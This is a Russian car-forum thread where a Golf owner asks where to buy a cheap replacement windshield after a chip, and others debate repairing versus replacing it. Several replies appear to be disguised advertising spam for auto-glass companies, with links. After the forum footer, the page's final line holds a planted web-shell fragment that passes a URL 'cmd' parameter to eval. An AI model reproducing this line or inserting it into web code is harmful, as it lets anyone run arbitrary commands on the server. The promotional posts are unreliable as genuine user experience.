+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Стекло


  1. #1
    Мимо проходил Filipp is on a distinguished road Аватар для Filipp
    Регистрация
    27.12.2018
    Откуда
    .
    Машина
    VW
    Сообщений
    73

    Стекло

    Привет всем. Такая проблема. Приехал в Москву на своей машине. И по дороге камешек прилетел - на лобовухе скол большой. Думаю, что день-два и трещина пойдет. Надо менять. Посоветуете где купить не дорого?

  2. #2
    Мимо проходил Milana is on a distinguished road Аватар для Milana
    Регистрация
    27.12.2018
    Откуда
    -
    Машина
    Гольф 5
    Сообщений
    16
    Так если у вас только скол, то может и менять-то пока не надо? Заехали бы в автосервис, посмотрели - может его отремонтировать можно да и все? Дешевле выйдет. Муж мою машину именно что на ремонт загнал и до сих пор езжу, почти и не видно, что стекло было повреждено

  3. #3
    Мимо проходил Veron is on a distinguished road Аватар для Veron
    Регистрация
    26.12.2018
    Откуда
    РФ
    Машина
    Гольф
    Сообщений
    47
    Ну это вам просто повезло. А вот я скол ремонтировал, так на две недели только и хватило - потом все равно трещина пошла. Так что получается, что с этим ремонтом просто деньги на ветер выбросил. Надо было сразу менять да и все. Так что мой совет - автор, не откладывайте замену, тем более, что лобовое стекло найти вообще не проблема. Вот эта фирма, например, продажей автостекол занимается: https://autoglassworld.ru/

  4. #4
    Мимо проходил Medved is on a distinguished road Аватар для Medved
    Регистрация
    27.12.2018
    Откуда
    Россия
    Машина
    Гольф
    Сообщений
    42
    В ремонте никакого толку - подтверждаю. Лично я сразу стекло поменял. Причем купил оригинальное, у официального дилера. Но мне проще - у меня КАСКО, вот и не переживал

  5. #5
    Новичок blalala is on a distinguished road Аватар для blalala
    Регистрация
    30.06.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    152
    Привет, лучше всего с такой проблемой обратиться в хороший автосервис. Могу вам порекомендовать отремонтировать авто вот тут http://eastserviceauto.ru ,я часто сюда заезжаю, так как ломается машина достаточно частою Обязательно обратите внимание на данный вариант. Вам он должен очень понравиться. Прекрасная возможность починить свою машинку в короткие сроки.

  6. #6
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    Хочу рассказать о том, как я где-то наверное, месяц назад менял лобовое стекло в компании «Автогласс Моторс» https://www.autoglass.ru/toyota.html. Сразу скажу, что остался очень доволен, так как работа выполнена во-первых – быстро, а во-вторых очень качественно. Я созвонился с сотрудниками сервиса накануне и обговорил все необходимые моменты и пригнал им автомобиль в назначенное время и оставил его на непродолжительное время. Чтобы вы понимали, что в этот же день я уже забрал свой автомобиль, где было заменено лобовое стекло, при этом я получила на него гарантии и меня заверили, что никаких проблем не будет. Отличная компания оказалась.

  7. #7
    GTI-Racing Magistral is on a distinguished road Аватар для Magistral
    Регистрация
    11.12.2010
    Откуда
    Москва
    Машина
    Golf
    Сообщений
    156
    Да это заделать можно за полчаса, по сути

  8. #8
    Новичок Meloun is on a distinguished road Аватар для Meloun
    Регистрация
    14.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    107
    У меня были трещины на лобовом стекле автомобиля. В этом вопросе помогли в компании “Сколовнет”. Там работают специалисты с опытом работы от 3-х лет в данной сфере. Ремонт сколов лобового стекла – достаточно тонкая и кропотливая работа, которая требует не только профессиональных навыков мастера, но и применение специальных материалов и высокотехнологического оборудования. Приятно, что с решением всех вопросов помогли на сайте https://skolovnet.pro/msk/catalog/re...lov-i-treschin обратился к услуге ремонт сколов и трещин. Специалисты выполнили работы качественно, что важно. Рекомендую компанию всем, как лучшую.

+ Ответить в теме

Похожие темы

  1. Заднее стекло
    от Renegat в разделе Стайлинг: кузов, салон, свет и прочее
    Ответов: 5
    Последнее сообщение: 21.11.2019, 07:01
  2. стекло
    от dasa в разделе Покупка и продажа запчастей
    Ответов: 3
    Последнее сообщение: 13.08.2019, 15:41
  3. Боковое стекло
    от Евгений Наумов в разделе Ремонт и обслуживание
    Ответов: 3
    Последнее сообщение: 13.12.2018, 18:53
  4. Стекло
    от Fortuna в разделе Разное
    Ответов: 11
    Последнее сообщение: 14.10.2018, 21:50
  5. Ищу лобовое стекло GTI 6
    от Багыч в разделе Покупка и продажа запчастей
    Ответов: 1
    Последнее сообщение: 25.07.2014, 11:08

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}